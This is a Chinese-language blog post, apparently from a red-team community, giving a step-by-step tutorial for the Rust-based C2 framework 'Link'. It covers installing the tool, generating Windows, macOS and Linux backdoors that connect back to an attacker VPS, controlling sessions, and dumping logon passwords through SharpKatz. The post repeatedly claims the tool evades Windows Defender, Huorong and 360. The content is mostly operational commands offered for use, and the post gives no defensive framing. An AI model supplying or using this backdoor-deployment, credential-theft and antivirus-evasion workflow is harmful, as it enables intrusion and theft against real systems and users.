⼀款新的C2攻击⼯具-Link

2022-02-10 08:55:00 浏览数 (1)

文章来源|MS08067 内网攻防知识星球

本文作者:清风(Ms08067内网小组核心成员)

⼀、⼯具简介

在翻看公众号的时候发现有⼤佬简单介绍了下这款⼯具,⽹上的教程⼏乎没有,简单研究了下。

Link :rust 语⾔开发的 c2 框架,因为开发语⾔⼩众,所以⽬前国内所有杀软都可过包括WindowsDefender。

功能虽然没有MSF和CobaltStrike成熟,但还是很强⼤的,⾜够实现红队渗透测试⼯作,当CS/MSF特征⽆法绕过的时候,可以尝试使⽤这个⼯具

项⽬地址:

https://github.com/postrequest/link

⼆、安装 不知道是什么原因,国外的vps安装后都⽆法⽣成载荷,暂时未能解决,最后⽤国内vps实验成功的 安装过程较为简单 :

代码语言:javascript复制
$ git clone https://github.com/postrequest/link
$ cd link/
$ ./kali-install.sh

执⾏后 会出现这个⻚⾯后,三个选项分别是: 1、继续安装(默认安装) 2、⾃定义安装 3、取消安装

这⾥选择 1 默认安装即可 安装过程较为漫⻓,需要等待下⾯进度条结束:

结束后后直接重启,因为 rust 安装完后需要重启⽣效 :

重启后,再次进⼊到/link⽂件夹下,运⾏启动命令:

代码语言:javascript复制
./target/release/link //不建议进⼊/target/release/⽬录再执⾏link,那样会让你指定
证书位置

启动后,会让你设置⼀个监听端⼝,这个端⼝也是后续shellcode中的端⼝ :

然后进⼊到link的管理模式下,

主要⽤到前三条: 在 Windows, MacOS , Linux 中⽣成载荷:

代码语言:javascript复制
generate vps-ip:port #⽣成 windows 后⻔
generate-osx vps-ip:port #⽣成 苹果 载荷
generate-linux vps-ip:port #⽣成 linux 载荷

Windows 上线: ⽣成Windows后⻔(过程相当漫⻓,请耐⼼等待):

代码语言:javascript复制
generate vps-ip:9080

运⾏link.exe 后上线: 查看当前会话:links ,类似MSF的Sessions

进⼊到当前会话 links -i 会话ID : 进⼊到当前会话中后 可以执⾏命令 whoami

抓取密码: 这个模块需要安装 SharpCollection ⼯具,不然会报错,提示你安装

安装完后再次执⾏:

代码语言:javascript复制
sharp //可罗列出所有的tools

功能很多,这⾥只介绍SharpKatz模块

SharpKatz 参数介绍:

https://github.com/b4rtik/SharpKatz

代码语言:javascript复制
sharp svchost SharpKatz --Command logonpasswords //抓取密码

还有很多功能,后续待补充。

Linux上线: ⽣成后⻔:

然后上传到⽬标运⾏ ,成功上线,然后就是Linux上线后的操作:

执⾏命令:

代码语言:javascript复制
shell linux命令

未完待续。。。

ByPass ⽅⾯: 通过测试发现:Windows Defender、⽕绒、 360 动态、静态都可过

0 人点赞